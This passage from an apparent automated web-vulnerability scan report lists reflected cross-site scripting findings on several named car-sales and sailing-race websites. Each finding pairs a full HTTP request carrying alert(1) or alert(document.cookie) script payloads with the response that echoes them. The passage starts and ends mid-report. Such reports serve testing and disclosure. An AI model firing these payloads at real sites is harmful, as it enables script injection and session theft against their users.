Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:04 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/my-garage.htm?6b79c"><script>alert(1)</script>b4f72701277=1">
...[SNIP]...

4.505. http://www.autobytel.com/new-car-price-quotes.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/new-car-price-quotes.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7519c"><script>alert(1)</script>65d403b7baa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-car-price-quotes.htm?7519c"><script>alert(1)</script>65d403b7baa=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:55:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:55:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:55:46 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:55:46 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62743

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/new-car-price-quotes.htm?7519c"><script>alert(1)</script>65d403b7baa=1">
...[SNIP]...

4.506. http://www.autobytel.com/repair-cost-calculator/my-garage.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/repair-cost-calculator/my-garage.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60236"><script>alert(1)</script>044cc4d79e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /repair-cost-calculator/my-garage.htm?60236"><script>alert(1)</script>044cc4d79e2=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:55:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:55:05 GMT
Content-Length: 22226
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:55:05 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/repair-cost-calculator/my-garage.htm?60236"><script>alert(1)</script>044cc4d79e2=1">
...[SNIP]...

4.507. http://www.autobytel.com/sitemap/index.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/sitemap/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c053"><script>alert(1)</script>033a7d26254 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitemap/index.cfm?9c053"><script>alert(1)</script>033a7d26254=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:57:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 51417

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/sitemap/index.cfm?9c053"><script>alert(1)</script>033a7d26254=1">
...[SNIP]...

4.508. http://www.autobytel.com/used-cars.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/used-cars.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75453"><script>alert(1)</script>f5531f9e8e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-cars.htm?75453"><script>alert(1)</script>f5531f9e8e2=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 79111
Expires: Mon, 24 Jan 2011 23:54:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:54:11 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:54:11 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:54:11 GMT;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/used-cars.htm?75453"><script>alert(1)</script>f5531f9e8e2=1">
...[SNIP]...

4.509. http://www.autocheck.com/ [siteID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autocheck.com
Path:	/

Issue detail

The value of the siteID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddbac"%3balert(1)//c700bf66469 was submitted in the siteID parameter. This input was echoed as ddbac";alert(1)//c700bf66469 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?WT.mc_id=1824&siteID=1824ddbac"%3balert(1)//c700bf66469 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:54:25 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.313621295913265271; path=/; expires=Wed, 23-Feb-11 23:54:25 GMT
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Cache-Control: private
Set-Cookie: referralCookie=aAvYRKxoy9j9tyYC62; path=/; expires=Wed, 23-Feb-2011 23:54:24 GMT
Set-Cookie: JSESSIONID=aAvYRKxoy9j9tyYC62; path=/
Connection: close
Content-Type: text/html
Content-Length: 30580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1
...[SNIP]...

...[SNIP]...

4.510. http://www.autocheck.com/ [siteID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autocheck.com
Path:	/

Issue detail

The value of the siteID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71a71"><script>alert(1)</script>6dab831a574 was submitted in the siteID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?WT.mc_id=1824&siteID=182471a71"><script>alert(1)</script>6dab831a574 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:54:22 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.19341295913262634; path=/; expires=Wed, 23-Feb-11 23:54:22 GMT
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Cache-Control: private
Set-Cookie: referralCookie=bFL73dHR0oz-n3XC62; path=/; expires=Wed, 23-Feb-2011 23:54:22 GMT
Set-Cookie: JSESSIONID=bFL73dHR0oz-n3XC62; path=/
Connection: close
Content-Type: text/html
Content-Length: 30844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1
...[SNIP]...
<a class="main" href="http://usedcars.autocheck.com?WT.mc_id=182471a71"><script>alert(1)</script>6dab831a574&siteID=182471a71">
...[SNIP]...

4.511. http://www.autotrader.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc4cb"%3balert(1)//1ee177b82c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc4cb";alert(1)//1ee177b82c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?bc4cb"%3balert(1)//1ee177b82c=1 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:57:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=73D9E7C5239D08C715DEA475D07D7060; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Tue, 31-Jan-2012 23:57:06 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerAT-Production_hhtp=3979503114.61475.0000; path=/
Content-Length: 60162

<!DOCTYPE html P
...[SNIP]...
<script type="text/javascript">
BIRFPageData = {
pg_inst:"376865021865166256",
logDomain:"http://www.autotrader.com",
my:false,
params:{
"bc4cb";alert(1)//1ee177b82c":"1",
"disableImpressions":"false"
}
};
</script>
...[SNIP]...

4.512. http://www.autotrader.com/hornav/trader/index.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/hornav/trader/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2aba"%3balert(1)//c38b5e5e306 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2aba";alert(1)//c38b5e5e306 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /hornav/trader/index.jsp?c2aba"%3balert(1)//c38b5e5e306=1 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:56:30 GMT
Server: Apache
Set-Cookie: JSESSIONID=C360AF28D0BC5EDA43BF2A39CE968F78; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Tue, 31-Jan-2012 23:56:30 GMT; Path=/
Set-Cookie: ac_afflt=; Path=/
Content-Language: en
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: BIGipServerAT-Production_hhtp=3476186634.61475.0000; path=/
Content-Length: 43866

<birf:pageLoad pg="syc_lp"></birf:pageLoad>
<script type="text/javascript">
BIRFPageData = {
pg_inst:"624621212101090264",
logDomain:"http://www.autotrader.com",
my:false,
params:{
"c2aba";alert(1)//c38b5e5e306":"1",
"disableImpressions":"false"
}
};
</script>
...[SNIP]...

4.513. http://www.autotraderstatic.com/dwr/interface/MarketManager.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autotraderstatic.com
Path:	/dwr/interface/MarketManager.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 15dee<script>alert(1)</script>1c89ef9af97 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/interface/MarketManager.js15dee<script>alert(1)</script>1c89ef9af97?v=3.17.167500 HTTP/1.1
Host: www.autotraderstatic.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: M7F1=CT

Response

HTTP/1.1 501 Not Implemented
Server: Apache
Last-Modified: Tue, 07 Dec 2010 13:18:55 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=604758
Date: Tue, 25 Jan 2011 02:52:30 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 74

No class by name: MarketManager15dee<script>alert(1)</script>1c89ef9af97

4.514. http://www.autotraderstatic.com/dwr/interface/ModelSearchUtil.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autotraderstatic.com
Path:	/dwr/interface/ModelSearchUtil.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d8912<script>alert(1)</script>804014494e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/interface/ModelSearchUtil.jsd8912<script>alert(1)</script>804014494e4?v=3.17.167500 HTTP/1.1
Host: www.autotraderstatic.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: M7F1=CT

Response

HTTP/1.1 501 Not Implemented
Server: Apache
Last-Modified: Tue, 07 Dec 2010 12:49:02 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=604763
Date: Tue, 25 Jan 2011 02:52:30 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 76

No class by name: ModelSearchUtild8912<script>alert(1)</script>804014494e4

4.515. http://www.autotraderstatic.com/dwr/interface/UserMsgController.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autotraderstatic.com
Path:	/dwr/interface/UserMsgController.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a4a28<script>alert(1)</script>00a7fd303d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/interface/UserMsgController.jsa4a28<script>alert(1)</script>00a7fd303d HTTP/1.1
Host: www.autotraderstatic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: M7F1=CT;

Response

HTTP/1.1 501 Not Implemented
Server: Apache
Last-Modified: Thu, 13 Jan 2011 21:33:44 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=604788
Date: Tue, 25 Jan 2011 14:24:57 GMT
Connection: close
Content-Length: 77

No class by name: UserMsgControllera4a28<script>alert(1)</script>00a7fd303d

4.516. http://www.barcelonaworldrace.org/en/actualite/breves [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.barcelonaworldrace.org
Path:	/en/actualite/breves

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 556c1"><script>alert(1)</script>727745fc927 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite556c1"><script>alert(1)</script>727745fc927/breves HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 14:31:39 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web13; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite556c1"><script>alert(1)</script>727745fc927/breves">
...[SNIP]...

4.517. http://www.barcelonaworldrace.org/en/actualite/breves [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.barcelonaworldrace.org
Path:	/en/actualite/breves

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2d1b"><script>alert(1)</script>dd99ef630da was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite/brevesf2d1b"><script>alert(1)</script>dd99ef630da HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 14:32:01 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web12; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/brevesf2d1b"><script>alert(1)</script>dd99ef630da">
...[SNIP]...

4.518. http://www.barcelonaworldrace.org/en/actualite/breves [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.barcelonaworldrace.org
Path:	/en/actualite/breves

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab784"><script>alert(1)</script>de6cf7e9710 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en/actualite/breves?ab784"><script>alert(1)</script>de6cf7e9710=1 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:25:18 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web11; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/breves/?ab784"><script>alert(1)</script>de6cf7e9710=1">
...[SNIP]...

4.519. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.barcelonaworldrace.org
Path:	/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26a86"><script>alert(1)</script>e4c5d77f49c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite26a86"><script>alert(1)</script>e4c5d77f49c/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 14:27:23 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web12; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite26a86"><script>alert(1)</script>e4c5d77f49c/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072">
...[SNIP]...

4.520. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.barcelonaworldrace.org
Path:	/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d466d"><script>alert(1)</script>bba68bdbca5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/actualite/brevesd466d"><script>alert(1)</script>bba68bdbca5/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 14:28:17 GMT
Server: Apache
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web12; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<!-- inclusion de la gestion des channel
...[SNIP]...
<a href="/es/actualite/brevesd466d"><script>alert(1)</script>bba68bdbca5/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072">
...[SNIP]...

4.521. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.barcelonaworldrace.org
Path:	/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfb6e"><script>alert(1)</script>f1e290a806 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

